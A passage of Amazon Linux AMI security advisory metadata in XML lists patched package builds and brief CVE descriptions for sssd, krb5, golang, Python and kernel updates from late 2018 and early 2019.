release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.8.3-4.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.8.3-4.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.8.3-4.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.8.3-4.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.8.3" release="4.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-winbind-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.8.3-4.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.8.3-4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1127</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1127: low priority package update for sssd</title><issued date="2019-01-22 18:00:00" /><updated date="2019-01-25 02:40:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10852:
The UNIX pipe which sudo uses to contact SSSD and read the available sudo rules from SSSD utilizes too broad of a set of permissions. Any user who can send a message using the same raw protocol that sudo and SSSD use can read the sudo rules available for any user.
1588810:
CVE-2018-10852 sssd: information leak from the sssd-sudo responder
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10852" title="" id="CVE-2018-10852" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sssd" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-proxy" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-proxy-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-ad" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ad-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-devel-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="python27-sss" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="python27-sss-murmur" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-murmur-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-client" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-client-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_autofs" version="1.16.2" 
release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_autofs-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5-common" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-common-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-ipa" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ipa-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-debuginfo" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-debuginfo-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-devel-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-common" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-ldap" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ldap-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-devel-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-common-pac" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-pac-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.2" release="13.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libsss_idmap-devel-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libipa_hbac-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="python27-sssdconfig" version="1.16.2" release="13.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-sssdconfig-1.16.2-13.amzn1.noarch.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-devel-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_sudo" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_sudo-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-dbus" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-dbus-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libsss_nss_idmap-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-tools" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-tools-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-devel-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.2" release="13.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/sssd-winbind-idmap-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libipa_hbac-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_sudo" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_sudo-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-client" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-client-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-winbind-idmap-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-dbus" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-dbus-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libipa_hbac" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-krb5" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-tools" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-tools-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-common" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-proxy" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-proxy-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.2" release="13.amzn1" epoch="0" 
arch="i686"><filename>Packages/libsss_idmap-devel-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-1.16.2-13.amzn1.i686.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libsss_nss_idmap-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-krb5-common" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-common-1.16.2-13.amzn1.i686.rpm</filename></package><package name="python27-sss-murmur" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-murmur-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_autofs" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_autofs-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-devel-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-ipa" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ipa-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_certmap" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-1.16.2-13.amzn1.i686.rpm</filename></package><package name="python27-sss" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-ad" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ad-1.16.2-13.amzn1.i686.rpm</filename></package><package 
name="sssd-libwbclient-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-devel-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-devel-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-devel-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_idmap" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-devel-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-common-pac" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-pac-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-ldap" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ldap-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-debuginfo" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-debuginfo-1.16.2-13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1129</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1129: low priority package update for krb5</title><issued date="2019-01-23 18:58:00" /><updated date="2019-01-25 02:39:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the 
following vulnerabilities:
CVE-2018-5730:
MIT krb5 1.6 or later allows an authenticated kadmin with permission to add principals to an LDAP Kerberos database to circumvent a DN containership check by supplying both a &quot;linkdn&quot; and &quot;containerdn&quot; database argument, or by supplying a DN string which is a left extension of a container DN string but is not hierarchically within the container DN.
1551082:
CVE-2018-5730 krb5: DN container check bypass by supplying special crafted data
CVE-2018-5729:
MIT krb5 1.6 or later allows an authenticated kadmin with permission to add principals to an LDAP Kerberos database to cause a denial of service (NULL pointer dereference) or bypass a DN container check by supplying tagged data that is internal to the database module.
1551083:
CVE-2018-5729 krb5: null dereference in kadmind or DN container check bypass by supplying special crafted data
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5729" title="" id="CVE-2018-5729" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5730" title="" id="CVE-2018-5730" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-server-ldap" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="libkadm5" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libkadm5-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="34.44.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.15.1-34.44.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="34.44.amzn1" 
epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.15.1-34.44.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="34.44.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.15.1-34.44.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.15.1" release="34.44.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.15.1-34.44.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="34.44.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.15.1-34.44.amzn1.i686.rpm</filename></package><package name="libkadm5" version="1.15.1" release="34.44.amzn1" epoch="0" arch="i686"><filename>Packages/libkadm5-1.15.1-34.44.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="34.44.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.15.1-34.44.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="34.44.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.15.1-34.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1130</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1130: important priority package update for golang</title><issued date="2018-12-14 18:50:00" /><updated date="2018-12-14 22:32:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-16875:
The crypto/x509 package of Go before 1.10.6 and 1.11.x before 1.11.3 does not limit the amount of work performed for each chain verification, which might allow attackers to craft pathological inputs leading to a CPU denial of service. Go TLS servers accepting client certificates and TLS clients are affected.
1657565:
CVE-2018-16875 golang: crypto/x509 allows for denial of service via crafted TLS client certificate
CVE-2018-16874:
In Go before 1.10.6 and 1.11.x before 1.11.3, the &quot;go get&quot; command is vulnerable to directory traversal when executed with the import path of a malicious Go package which contains curly braces (both &#039;{&#039; and &#039;}&#039; characters). Specifically, it is only vulnerable in GOPATH mode, but not in module mode (the distinction is documented at https://golang.org/cmd/go/#hdr-Module_aware_go_get). The attacker can cause an arbitrary filesystem write, which can lead to code execution.
1657564:
CVE-2018-16874 golang: "go get" vulnerable to directory traversal via malicious package
CVE-2018-16873:
In Go before 1.10.6 and 1.11.x before 1.11.3, the &quot;go get&quot; command is vulnerable to remote code execution when executed with the -u flag and the import path of a malicious Go package, or a package that imports it directly or indirectly. Specifically, it is only vulnerable in GOPATH mode, but not in module mode (the distinction is documented at https://golang.org/cmd/go/#hdr-Module_aware_go_get). Using custom domains, it&#039;s possible to arrange things so that a Git repository is cloned to a folder named &quot;.git&quot; by using a vanity import path that ends with &quot;/.git&quot;. If the Git repository root contains a &quot;HEAD&quot; file, a &quot;config&quot; file, an &quot;objects&quot; directory, a &quot;refs&quot; directory, with some work to ensure the proper ordering of operations, &quot;go get -u&quot; can be tricked into considering the parent directory as a repository root, and running Git commands on it. That will use the &quot;config&quot; file in the original Git repository root for its configuration, and if that config file contains malicious commands, they will execute on the system running &quot;go get -u&quot;.
1657563:
CVE-2018-16873 golang: "go get" command vulnerable to RCE via import of malicious package
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16873" title="" id="CVE-2018-16873" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16874" title="" id="CVE-2018-16874" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16875" title="" id="CVE-2018-16875" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-misc" version="1.10.6" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.10.6-1.47.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.10.6" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.10.6-1.47.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.10.6" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.10.6-1.47.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.10.6" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.10.6-1.47.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.10.6" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.10.6-1.47.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.10.6" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.10.6-1.47.amzn1.noarch.rpm</filename></package><package name="golang-docs" version="1.10.6" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.10.6-1.47.amzn1.noarch.rpm</filename></package><package name="golang" version="1.10.6" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.10.6-1.47.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.10.6" release="1.47.amzn1" epoch="0" 
arch="i686"><filename>Packages/golang-bin-1.10.6-1.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1132</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1132: medium priority package update for python34 python36</title><issued date="2018-12-20 00:01:00" /><updated date="2019-01-12 03:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14647:
Python&#039;s elementtree C accelerator failed to initialise Expat&#039;s hash salt during initialization. This could make it easy to conduct denial of service attacks against Expat by constructing an XML document that would cause pathological hash collisions in Expat&#039;s internal data structures, consuming large amounts of CPU and RAM.
1631822:
CVE-2018-14647 python: Missing salt initialization in _elementtree.c module
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14647" title="" id="CVE-2018-14647" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-libs" version="3.4.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.9-1.40.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.9-1.40.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.9-1.40.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.9-1.40.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.9" 
release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.9-1.40.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.9-1.40.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.7" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.7-1.10.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.7" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.7-1.10.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.7" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.7-1.10.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.7" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.7-1.10.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.7" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.7-1.10.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.7" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.7-1.10.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.7" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.7-1.10.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.7" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.7-1.10.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.7" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.7-1.10.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.7" release="1.10.amzn1" epoch="0" 
arch="i686"><filename>Packages/python36-debuginfo-3.6.7-1.10.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.7" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.7-1.10.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.7" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.7-1.10.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.7" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.7-1.10.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.7" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.7-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1133</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1133: medium priority package update for kernel</title><issued date="2018-12-20 00:02:00" /><updated date="2018-12-20 23:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-19407:
A NULL pointer dereference security flaw was found in the Linux kernel in the vcpu_scan_ioapic() function in arch/x86/kvm/x86.c. This allows local users with certain privileges to cause a denial of service via a crafted system call to the KVM subsystem.
1652656:
CVE-2018-19407 kernel: kvm: NULL pointer dereference in vcpu_scan_ioapic in arch/x86/kvm/x86.c
CVE-2018-18710:
An issue was discovered in the Linux kernel through 4.19. An information leak in cdrom_ioctl_select_disc in drivers/cdrom/cdrom.c could be used by local attackers to read kernel memory because a cast from unsigned long to int interferes with bounds checking.
1645140:
CVE-2018-18710 kernel: Information leak in cdrom_ioctl_select_disc in drivers/cdrom/cdrom.c
CVE-2018-16862:
A security flaw was found in the Linux kernel in a way that the cleancache subsystem clears an inode after the final file truncation (removal). The new file created with the same inode may contain leftover pages from cleancache and the old file data instead of the new one.
1649017:
CVE-2018-16862 kernel: cleancache: Infoleak of deleted files after reuse of old inodes
